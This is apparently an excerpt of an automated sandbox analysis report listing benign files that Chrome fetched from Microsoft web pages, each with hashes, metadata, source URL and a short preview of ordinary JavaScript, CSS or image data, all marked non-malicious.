                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1112334
                                                                                                                                                              Entropy (8bit):5.629353115806243
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5F9CB2240AEC370DCF4B38BC018B4A2C
                                                                                                                                                              SHA1:FCA9EC94FB3095651CC5EB9138FC26691EF4BF31
                                                                                                                                                              SHA-256:E461D7DB8B2E5F1134CF65A81CB67266012EFCA717F4A345FF82D565308B780C
                                                                                                                                                              SHA-512:A81D5CFAACA8B3FF2D80FC47ADE9F4EB441D3154B5D965CCA71EA071B20C779F7DCA9DB3720E939223F091E9086851C936E34430AD71F347606CDA204737A364
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://lpcdn.lpsnmedia.net/le_unified_window/10.40.1-release_1497670326/desktopEmbedded.js?version=10.40.1-release_1497670326
                                                                                                                                                              Preview:!function(){"use strict";var e={937:function(e,t){function r(e){return btoa(e).replace(/\+/g,"-").replace(/\//g,"_").replace(/=+$/,"")}function n(e,t,n){e(null,{verifier:t,challenge:r(String.fromCharCode.apply(null,new Uint8Array(n)))})}t.A=function(e,t){e||(e=43);for(var i=window.msCrypto||window.crypto,o=r(Array.prototype.map.call(i.getRandomValues(new Uint8Array(e)),(function(e){return String.fromCharCode(e)})).join("")).substring(0,e),a=new Uint8Array(o.length),c=0;c<o.length;c++)a[c]=o.charCodeAt(c);var u=i.subtle.digest("SHA-256",a);window.CryptoOperation?(u.onerror=t,u.oncomplete=function(e){n(t,o,e.target.result)}):u.then((function(e){n(t,o,e)})).catch(t)}}},t={};function r(n){var i=t[n];if(void 0!==i)return i.exports;var o=t[n]={exports:{}};return e[n](o,o.exports,r),o.exports}!function(){var e=crypto,t=function(e){return e instanceof CryptoKey};function n(e,t,r,n,i,o,a){try{var c=e[o](a),u=c.value}catch(e){return void r(e)}c.done?t(u):Promise.resolve(u).then(n,i)}var i=functi
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):5343
                                                                                                                                                              Entropy (8bit):7.870116880024841
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:94B141164E69B63099C5B5B739991B14
                                                                                                                                                              SHA1:156B837A54E7AB10F0FE54E69A1EA6826D5AFF2D
                                                                                                                                                              SHA-256:8EA4C24807CD6B308804DA70A94415B1748E01CAE0B93876D5215C71B8A7065F
                                                                                                                                                              SHA-512:5A7B056D4B8547798E3855CCF26CC4BA38B894FD8D363828397F5AD94E705CB52A779E207BC403FB0D1A42C718BCA087714489BFF55136A9D792F915196A3BEC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Analysts_Forrester?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..............................R...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......u...(....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................2mdat....."..v.2F...$@.Y..OJ...K..Xf.n.Ok.)...Z.Z...~.-X.!xh..c!.I5.C.J2c...;`*%.Z:..D....."..v..h4 2.%D......-.......J..5.V#?.jq....~N...N.....>P.%...w.3p.R9..c..._X....2..P....xli.y.QHc.`..b^..MM1..M'E.5kH.....bo.=.N.....>).jH...b.O.^F.^....gh..wK..v.P(..$.w...a/\D.$...*.........=.,`.e..1...i...-.....a$.}E..k:.j..=-..d'}........R.........0hd.t*T.h..H.@...R..D.x=.8...m..t.Cq5.8..U.T._[D...R...&....**...f4....4b.."Gau.N.M.\..5.@..V`Vo..n.q../.....h.=...../....)...v....i..q,.!06.a......`....O:.MT.h.....@..d.}............v>......-..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):5352
                                                                                                                                                              Entropy (8bit):7.8720095620056165
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:38B6DFE4E63AD04FA0F6B8FAC27E91EC
                                                                                                                                                              SHA1:B808F2F0D5EC7E1FAB087526EBFAFA2CD04475A0
                                                                                                                                                              SHA-256:FF32D3D9497BEF205A63D9A2E4D24915972723E8F281070EDBE989B28ADEA4E5
                                                                                                                                                              SHA-512:10FC7D9AB713558C5787B0E8275753028E91AE60DD245AD45A1506773ECC045F1CF76F22595464125D2C7AEFA4401A9598A863D588B42C323C68EAD67DC7951A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Analysts_Gartner?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=99&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............W.....................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......u...(....pixi............av1C........colrnclx...........ispe.......u...(....pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................'mdat....."..v.2......@..K....(.I..l0...n..y.C.....x....A..D^.......bm....-.Ss}. .7.....T.g...w.P.:.f.r..V...o..u".......m...7...Gj....`....."..v..h4 2.%........I..-...{.......S....N.g.J.U.U..$4.....zN..5/U7.C..@".]...q?k>|bsV..<.H.Y..T.H.+....._....a.m.,AP.d5...2.`@.)...$.M...|.."..}O.t5~E" ...D.O....i.x....A.(.d...~.......p.....!L,>...Q.e.\....A.8.u{..e;..q>.As.....U.."....[.H.N`.##....../..qv$.G...oTd;.1m4..!.o..'X..j.P..u}$Q..wh`Vzu.l.9&H.....C ..>.....'.....L.&(W+>h....j=........r.....x.H6J.Z.<...x..i.K.Z......o. .
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:C++ source, ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):13110
                                                                                                                                                              Entropy (8bit):4.53925643908527
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:42FFFAB3ACD04EA132F8C11D5E26059F
                                                                                                                                                              SHA1:66A844D51A5ED1A66DDB733216A7A2EB25A5729F
                                                                                                                                                              SHA-256:2F495FCAD3C118DBB2E28E094960E942974B43BDA1A9F1243CBA290DADFF0D1D
                                                                                                                                                              SHA-512:10A8A51FC663D18FBB7AE39B01DB347CF383EE60A2FB5F758589C06BBD2FAD7A9C2B0E5C54639AC1EDA35426A646458E74F46944C1551E43AA6FCD6B4640DC3C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/market-selector/v1/market-selector/clientlibs/sites/base.min.ACSHASH42fffab3acd04ea132f8c11d5e26059f.js
                                                                                                                                                              Preview:(() => {. /** Create ocrReimagine namespace */. if (!window.ocrReimagine) {. window.ocrReimagine = {};. }.. /** Create Market Selector module namespace */. if (!window.ocrReimagine.MarketSelector) {. window.ocrReimagine.MarketSelector = {};. }.. const cookieExpiryDays = 30;. const cookieKey = 'PMGSKUMarketCk';. /** @type {MarketSelector[]} */. const instances = [];. const queryParamKey = 'market';.. /**. * CSS selector.. * @enum {string}. */. const Selector = {. AFFECTED: '[data-oc-market-selector]',. DATA_MOUNT: '[data-mount="market-selector"]',. FW_LINKS: '[data-regenerate-fwlink="true"]',. SELECT_MENU: '.custom-select-input'. };.. /**. * JS event name.. * @enum {string}. */. const EventName = {. ON_INIT: 'onInit',. ON_REFRESHED: 'onRefreshed',. ON_REMOVE: 'onRemove',. ON_SELECT: 'onSelect',. ON_UPDATE: 'onUpdate'. };.. /**. *
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):141058
                                                                                                                                                              Entropy (8bit):7.997611730091476
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C42729E62D13446BFA0245DA298E59CA
                                                                                                                                                              SHA1:F862C600A6049F475DB8F783BC83D1A627A3F0B0
                                                                                                                                                              SHA-256:EE0AD81E888C02450D7D2AC4B8B6320DC718BF9930DDDE645FEA39EEF9EB8BB7
                                                                                                                                                              SHA-512:337DF6A75F1DCEE369218AFA16259F131EBADCA4BC30814914185DC1166D2F5C5BA498862C388D08C8BD9A675537FA617714A305EDD4112427360BC2EAA989FD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.&..WEBPVP8 .&..0....*..&.>...B!.Z=+..a,....;..@.+3....2.G..^@4.<.,e...%..o...o....|.<..7..L.JW(y....?H:....?......8...?........7..3.3....|......._..}7.....-}................._.o.....?......Q.3......._...~/...S...?..?.~...._...../.............|..w...7.......?..F.[.......O.W...?.?..?;>....Q.o.........'.....................`..?............/..................../.....?N...{...k....C.......o..q.........M........?..c.h.O.......o.Q.}..._..._.?.}..............%...W......_....6...O...?.?...........%Mc._..._......g.g.........I....O.O...~U.....................G..........;.....|.I./..........?....U...C.......?..z.3./.....?...._...?....?..y........./..................o.......2?...~....}./.+...@.....r/.._%.K.|."..=.k..xgT.Q....sd.....xaE.f...."..W..`........w.C./.._%.K.|."..E..9.A ..i..7..iB...1....h..9.@@l....KS..b...(.K.|."..E.\.....[...o..%..|....F..O.o.<~d..:..tQ.b.)7...../.._%.K.|."..E.W....6E...Nq.L+k.....Q.._G.-..[)..W..Qc...>....._%.K.|."..E.....,
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65389)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):67442
                                                                                                                                                              Entropy (8bit):5.302575163973494
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8F04CA1DA4D05EA73DCA7AFBBCF89342
                                                                                                                                                              SHA1:1BF9AB923A8EE067F268B418733782B0D82FA19C
                                                                                                                                                              SHA-256:9F2836FF4A458B7D761FCD9B4FA91F17F333A65C0AE3F4A201962135E1342354
                                                                                                                                                              SHA-512:4833A6D44B2D13B7C079AD21B600D67AE8276F41261B044004895DFF3FF6F2338CC87D4467A13362B87342DEC5B1E38113A092009B1A1851E766A3C33CBF763D
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC10ffc58a4a8a4d3c8b13ab7eae19c87b-source.min.js
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC10ffc58a4a8a4d3c8b13ab7eae19c87b-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC10ffc58a4a8a4d3c8b13ab7eae19c87b-source.min.js', "var eventTagging,ruleCorrelationGuid=\"KIF-472b86e4-85d2-424d-a035-610fe2345c81\";console.log(ruleCorrelationGuid+\": Launcher Rule Fired\"),window.oa=window.oa||{},window.oa.tagging=window.oa.tagging||{data:{},setup:{complete:{}},factory:{}},window.oa.tagging.utfv=\"972d797ce0b44da215c18a21afe54745d27e7082\",function(){function e(e){return e in n?n[e]:e}var t=window.oa.tagging.factory,n={critical:10,error:20,warn:30,info:40};t.handler=function e(t,n,i){if(!(this instanceof e))return new e(t,n,i);this._utfversion=\"2018-06-27 16:14:51\",this.name=t,this.handleMethod=n,this.logLevel=i},t.handler.prototype={},t.handlerBlock=function e(){if(!(this instanceof e))return new e;this._utfversion=\"2018-0
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (584)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):5006
                                                                                                                                                              Entropy (8bit):5.254875250489264
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2954890B89E77EADECA4558085241308
                                                                                                                                                              SHA1:EE0E88A398434019AAA6EA8A38867494C585B31A
                                                                                                                                                              SHA-256:06E35DF1A5074DA424B0FFB0BE44F5DAE4209C8C52F1F9C2FC53572509031831
                                                                                                                                                              SHA-512:737CFA7B339504B4667D1AECD33C84F6E6FF9115CBA2C503126108D38B32326AE934BCC24F39116B3E6010D61489290DC9FB86B0625D9CC7082B426339F4E3F1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/tabs/v2/tabs/clientlib/sites.min.ACSHASH2954890b89e77eadeca4558085241308.js
                                                                                                                                                              Preview:'use strict';class FilterPanel{constructor(e){this.WRAPPER_ELEMENTS={tabList:e.tabList,tabPanel:e.tabPanel};this.SELECTORS={tabsWrapper:".tabs-wrapper",activeTab:".tab.active",activePillItem:".tab-panel.active .pill-bar__item.active",cardCarouselContainer:".appsource-grid-container",tabRole:"[role\x3dtab]"};this.MAPS={wrapperElements:{tabList:e.tabList,tabPanel:e.tabPanel},tabInstances:[],filterTabData:window.appsource.filterTabData};this.STRINGS={};this.CONFIG={filterTab_urlKey:"filterTab",filter_urlKey:"",.selectedTab:"categories",selectedTabDefault:"categories",selectedFilter:"ai-machine-learning",selectedFilterDefault:"ai-machine-learning",requiredURLParams:["filterTab","categories","industries","product"],isPageLoad:!0,isTabClick:!1,popstate:!1};this.ELEMENTS={};this._updateCards=()=>{};this._updateURL=()=>{const a=new URL(window.location.href),b=this._createQueryParams();this.CONFIG.requiredURLParams.forEach(c=>{a.searchParams.delete(c)});a.searchParams.set(this.CONFIG.filterTab_
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (678)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5243
                                                                                                                                                              Entropy (8bit):5.395959363705534
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:3DB5CF9FD3FAB92B3889302C8DE78D1B
                                                                                                                                                              SHA1:1C493C13BC775036B36ACBA37941375ED0CE2ADA
                                                                                                                                                              SHA-256:D29DB6171FCF5458896561430C466007D6E9709F83DF0CB950E273B93DDA7853
                                                                                                                                                              SHA-512:1B13D7AA880D8987B5120FB6BB21CE53F6FB7769061E35C2BB87B59F32F176D52FC7F208461A7603EDCE26318E022B75F2CB27791C5D7A7D826B2C141D33AA70
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';(function(){function q(){return new Promise(function(e){window.oa=window.oa||{load:!0};(function(h,k){function m(b){b+="\x3d";for(var f=decodeURIComponent(h.cookie).split(";"),g=0;g<f.length;g++){for(var a=f[g];" "===a.charAt(0);)a=a.substring(1);if(0===a.indexOf(b))return a.substring(b.length,a.length)}return""}function p(b,f){if("function"===typeof b[3])b[3](b);var g=f.createElement("script");g.type="text/javascript";g.src=b[1];g.async=b[2];g.addEventListener("load",function(){b[4](b);.e()});g.addEventListener("readystatechange",function(){"complete"===this.readyState&&b[4](b)});if(b[8])b[8]();f.getElementsByTagName("head")[0].appendChild(g)}window.oa.container||(window.oa.container=!0,!function(b,f,g,a){for(var d=f.getElementsByTagName("script"),c=0;c<b.length;c++){var l=a(g.location.search.toLowerCase(),f.cookie),n=b[c];if(-1===Array.prototype.indexOf.call(d,f.location.protocol+n[1])&&n[6]&&n[0].test(f.location.href)){if(l!==n[5]&&null!==n[5]||m("bp_"+n[7].split(" ").j
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (579)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):188830
                                                                                                                                                              Entropy (8bit):5.595106744223951
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:FAE980FEA213BF6CAA461E53175C63F1
                                                                                                                                                              SHA1:308DCF1B13DD2A5F517847E45DF8DCA916B06087
                                                                                                                                                              SHA-256:B0A65AC944587C910E5C7C1A6FA501DDF12F0AC1DC37B3556D1AFCB57E20B1D1
                                                                                                                                                              SHA-512:62AF65BB499BC0A18AADF1040C832EC521517A7744D6D8D169AE2EC36C14A2DDD02B51DB893FD73E932FCF82D5556BE9D3D4CEB8A9F7989CFD46014C8C3DD0CD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1389],{../***/ 813110:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var Xp;var F;var Y;var La;var db;var Ma;var dl;var X;var x;var Bc;var Yb;var fl;var G;var eb;var jk;var Th;var Wg;var Qg;var J;var Pg;var Ee;var xe;var Zd;var lb;var fa;var u;var l;.var aa,da,ea,ka,ia,ra,qa,na,ma,xa,Aa,Ba,Ea,Fa,Ga,Ka,Oa,Qa,$a,Ya,Ua,Va,Wa,Xa,Za,cb,Ha,Ta,Ra,Sa,fb,hb,jb,kb,mb,ub,ob,yb,Ab,Eb,Fb,Hb,xb,Jb,Ib,Kb,Lb,Mb,Nb,Rb,Wb,Zb,bc,ac,cc,dc,hc,gc,jc,kc,rc,oc,Ec,yc,Fc,tc,Kc,Lc,Mc,Nc,Pc,Vc,Yc,$c,ad,bd,jd,fd,dd,cd,kd,ld,qd,ud,td,vd,rd,yd,zd,Ad,Cd,Ed,Gd,Hd,Id,Jd,Kd,Ld,Md,Od,Nd,Qd,Td,Sd,Vd,Ud,Xd,Yd,ae,ce,ne,be,oe,qe,re,ue,ve,Ae,ze,ye,De,Fe,Ge,He,Ie,Le,Ne,Oe,Pe,Me,Qe,Se,Te,V
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (9606), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):9606
                                                                                                                                                              Entropy (8bit):5.189330251800402
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:A6802AB98C4236C76CF9D79D73C108F8
                                                                                                                                                              SHA1:069A5381EF4081818B8CB0B2CA5E0427052DA092
                                                                                                                                                              SHA-256:3B0944DFEA209566C3A89112514FFA483A8518BCDD8B3F0FAB9AD70A08215A97
                                                                                                                                                              SHA-512:019DF91CB63A5D600C0FFB953E7A79EC3BC3FB82E372B931A06EF8F9856C9A6021EC9068B36EC7214A3F38326962505BC6E25886FFB3E6CAB113068BCE729A94
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://lpcdn.lpsnmedia.net/le_re/3.61.0-release_1396603402/jsv2/overlay.js?_v=3.61.0-release_1396603402
                                                                                                                                                              Preview:window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},lpTag.taglets.lightbox=function(){var n="",e={backgroundColor:"#000000",backgroundImage:"",opacity:0,filter:"alpha(opacity=0)",position:"fixed",top:0,left:0,bottom:0,right:0,zIndex:107108};return{_V:"1.3",name:"lightbox",init:function(){},show:function(){var t;(t=lpTag.taglets.lpJsonToDom.convert({containers:{css:e}})[0]).className=t.className+" LPMlightbox",lpTag.taglets.utils.appendToPage(t),n=t.id,t=lpTag.taglets.utils.geObjById(n),lpTag.taglets.lpAnimate.animate(t,{name:"opacity",targetVal:.7},{easing:"easeOutQuart",duration:1e3})},remove:function(){var t,e;t=function(){var e=lpTag.taglets.utils.geObjById(n);if(void 0!==e&&null!=e)try{e.parentNode.removeChild(e)}catch(t){e.style.display="none"}},e=lpTag.taglets.utils.geObjById(n),lpTag.taglets.lpAnimate.animate(e,{name:"opacity",targetVal:0},{easing:"easeOutQuart",duration:1e3,callback:t})}}},window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},function(){functi
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):5009
                                                                                                                                                              Entropy (8bit):4.532689799994779
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8F1B786599DDD1D6C94A1D907F2CB5FD
                                                                                                                                                              SHA1:4E5B3082D74407777629A4EE2B5DCA1768FF0C5D
                                                                                                                                                              SHA-256:20BF0322758485EE42D1480678AA5799087DAD8D0615AFCEF1448D0B34878AE3
                                                                                                                                                              SHA-512:FF10A31D0A94A78BB05AF0738A28ED65580F0DF5FA13CE3E69609407EB9D174B351B2139228A926FB3747245190213E28DEEB3F4CD7CBACA281CFE3E9923B87E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/*******************************************************************************. * Copyright 2018 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.(function() {. "use strict";.. let count = 0;. const prefix = "__footnote";.. /**. * Jumps to elements location without being hidden by the page navigation menu (if any). * @param {Event} event . * @param {JQuery Object} jumpToEleme
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1249
                                                                                                                                                              Entropy (8bit):7.399495937369451
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B1B2DC6D89BBF2B0A53D6CDF539450AF
                                                                                                                                                              SHA1:9FF6669EA52A2FDA867E97905E0C6BAF5F365F7E
                                                                                                                                                              SHA-256:CC3C2A7ED65F088033282532D5BDB3C9CBFC73B870077EEC30AF33CC02D6344B
                                                                                                                                                              SHA-512:77301DECDD7BF360015A78B97677E5A02C17F770F629F111CF2E73E0AD75FA8C89296F27BAC5EA438C645D657845FCA22117FE52D23E5670010DC5AB90915432
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Hero_BPI_icon1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=96&hei=96&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......`...`....pixi............av1C........colrnclx...........ipma...................mdat........`...B2..D....'...$....S=N.R.L(....#.`.A+...B......g.....6P......I.)..h4.l.a.^W...Fc.....^.BDBbW...E.z(.k/... ...B..M.>.L.B\r....".`.;.?e.5A..P.1._.Y..~d.u......X...../.>{.TNZ.K/...3...{2.z....\yl.@...b.`m..%.6<'.. P...).B/\Y_...v.3X.....]8........T.......$Q.q...../...B.....o.....C...3..>..h.......n..C......H.{....V..Kd......rU..{1Nx...t...V5N,..[.[5)R.G.{V.rt<...-.......`i...^.7)....m.nF(....0.R9>#...k....?B.s..x..a.&.......'.T..c.XG.73O.-.+t8DR..F.^fd...{..~e9b.9L.[8.......w..N...u..&.(.op.5.!%k........v.n`.q .s..t.!?..].o.......h.O..o..m.wiaT}4.( ..l..{>.E....J.....`1.x.....H..8......"c..`....u..).6.....I.....+.;.l.....&..]V..O..I....gI.)S.....Y,CN. .\.......
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):98246
                                                                                                                                                              Entropy (8bit):7.996916486445963
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:160F402EC279D4506DFBB04854EBA78A
                                                                                                                                                              SHA1:92BD5DF27A62947787CDD170037BC6E340221BA3
                                                                                                                                                              SHA-256:6F7E35E9DEEAEB8EFF507290288EA6B8A8F468962A838014C052925A179B47EE
                                                                                                                                                              SHA-512:37396BA4418FB42F3A1B8424FEF83BBB1F9E1790A14722D281C42261BBBB4E9E842335F7160545603AA3280AC2DAFB4C5188DCF5364E922FFCA8BD379971EDEE
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 ....p?...*..&.>...B!....l......nit..:..c..%....*..P............[>.n..m./...}ch.....k......_.../.~......._...c.?.y.r..?.....?......{......p?..........M...g.O.........y.+.o................G.........?......=......./..._.?....`.g........A.................o...>...~.{......_....s...[.?....O...+..?.|...._....`.u.o.......~M...o.?..@.....O.'.?......{...?....k.....3.....?f............`.....y.........?.}...._._....|...?...................{....d?.....i...._....z.r...o..._....?..{.......................t.......M...W.........Y...g..._........s.._.....i......./......d.....w....p..6.s~......%.I.A......\....>xS...k+f.A..{Y[$rR...........I .....I..........:,i....d?.....QU...O.=/B.I .j..l2.c9.k..+z.e.....S.!.i.....f.A.0...p........Y[4...4..+>_'X.8....D.... o...~.1 .xy.<.......T.....2.{O.d..;.F..`u^..h.T.i...!................B. P....Z.q....._...<.k...I..7..H...vhia.?A.)..=+Z..U...A9.t|..@*.h$.E..".j^....A.!..Ky.....1.<y..h$.f...3.V....h...?....=+Z....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (3927), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):3927
                                                                                                                                                              Entropy (8bit):5.20526481753379
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:50BC89D3D37D2437D09164D95B4B258C
                                                                                                                                                              SHA1:27A948412D6C0E369BE353E3DDA2DD71597F2174
                                                                                                                                                              SHA-256:D54FDC3901EDECCA0B9423901F357E58239DE8C56D26EA56DCBF9F932AB8C9BD
                                                                                                                                                              SHA-512:62B9DF0C834BAD376644B015541BF7145FA5D5E9E87E2C36CAE6CD6F4CA01D36B6F70F5CBABB1A177583423616F6AA56F930828ADD0DFE2FA986D36551593788
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/msonecloudapi/assets/msochead.css
                                                                                                                                                              Preview:header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature h1.text-teams{margin:0}header[data-header-footprint="/OfficeProducts/teamsheader, fromService: True"] .feature .card-body .link-group.link-group-col-2{margin-top:35px}[data-component-id=d86b06c2fa504a3e1bfc37d37bc0eee7] .nav-bar{z-index:500}#highlight-ocf2a1 .card-background{margin-top:0;margin-bottom:0}#highlight-ocf2a1 .card-background>img,#highlight-ocf2a1 .card-background>picture{height:100%;width:100%}#layout-container-uid93df .row>.col{align-self:unset!important}@media (min-width:860px){#layout-container-uid93df .row>.col{display:flex}#layout-container-uid93df .col.align-self-start.text-md-left.no-gutters.mb-4.mb-md-0{padding-bottom:1.5rem!important}}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row{margin-left:0;margin-right:0}:not(.container)>[data-component-id="9ff80f278e2186de9dc83ecbc7bd5dbe"].image-tabs>.row [class*=col-]{padding-left:0;padding-right
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):406
                                                                                                                                                              Entropy (8bit):4.645093417199183
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F9F2395C582FA601707B7A5DFAE9F05F
                                                                                                                                                              SHA1:27B15AECD0BFDD3B25556AC00755856D4D331E0D
                                                                                                                                                              SHA-256:D7D6D06624D4BDF6935B848DF342CE322D02B58D12BF12149DF92D557E5E9BC4
                                                                                                                                                              SHA-512:F3378927D96B0B172981A821A8C2A16D0F397ED92E835B7C46316FC48350402D972A5411F0FA4C260F205AA1F7917F83F8247BF8A62C7F22E0076B168275B1E9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
